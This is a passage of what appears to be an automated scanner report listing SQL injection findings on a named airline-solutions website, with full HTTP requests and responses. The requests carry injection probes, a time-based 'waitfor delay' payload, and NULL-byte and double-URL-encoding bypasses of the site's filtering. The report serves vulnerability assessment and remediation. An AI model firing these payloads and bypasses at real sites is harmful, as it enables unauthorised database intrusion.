Last-Modified: Wed, 06 Oct 2010 02:22:41 GMT
Pragma: no-cache
Content-Length: 7109
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

2.12. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier/ [exp_last_visit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_qualifier/

Issue detail

The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086%00'; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:54:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086%00''; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322054; expires=Thu, 06-Oct-2011 01:54:25 GMT; path=/
Set-Cookie: exp_last_activity=1286348065; expires=Thu, 06-Oct-2011 01:54:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:54:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.13. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_explorer [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_flight_explorer

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382%00'; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382%00''; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:57:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322636; expires=Thu, 06-Oct-2011 01:57:28 GMT; path=/
Set-Cookie: exp_last_activity=1286348248; expires=Thu, 06-Oct-2011 01:57:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:57:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.14. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_flight_plan_manager

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322639; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_last_activity=1286346795; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:33:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.15. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_load_manager/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header. The application took 55344 milliseconds to respond to the request, compared with 26406 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /home/products_services/product/sabre_aircentre_load_manager/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)')waitfor%20delay'0%3a0%3a20'--
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322107; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:13:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322107; expires=Thu, 06-Oct-2011 02:13:38 GMT; path=/
Set-Cookie: exp_last_activity=1286349218; expires=Thu, 06-Oct-2011 02:13:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:14:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22352


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.16. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_movement_control

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:33:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322670; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_last_activity=1286346795; expires=Thu, 06-Oct-2011 01:33:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:33:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23326


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.17. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_revenue_integrity/ [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_revenue_integrity/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:52:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322292; expires=Thu, 06-Oct-2011 01:52:37 GMT; path=/
Set-Cookie: exp_last_activity=1286347957; expires=Thu, 06-Oct-2011 01:52:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fproduct%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A3%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:52:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 24039


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.18. http://www.sabreairlinesolutions.com/home/products_services/product/technical_records_hub [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/technical_records_hub

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /home%2527/products_services/product/technical_records_hub HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
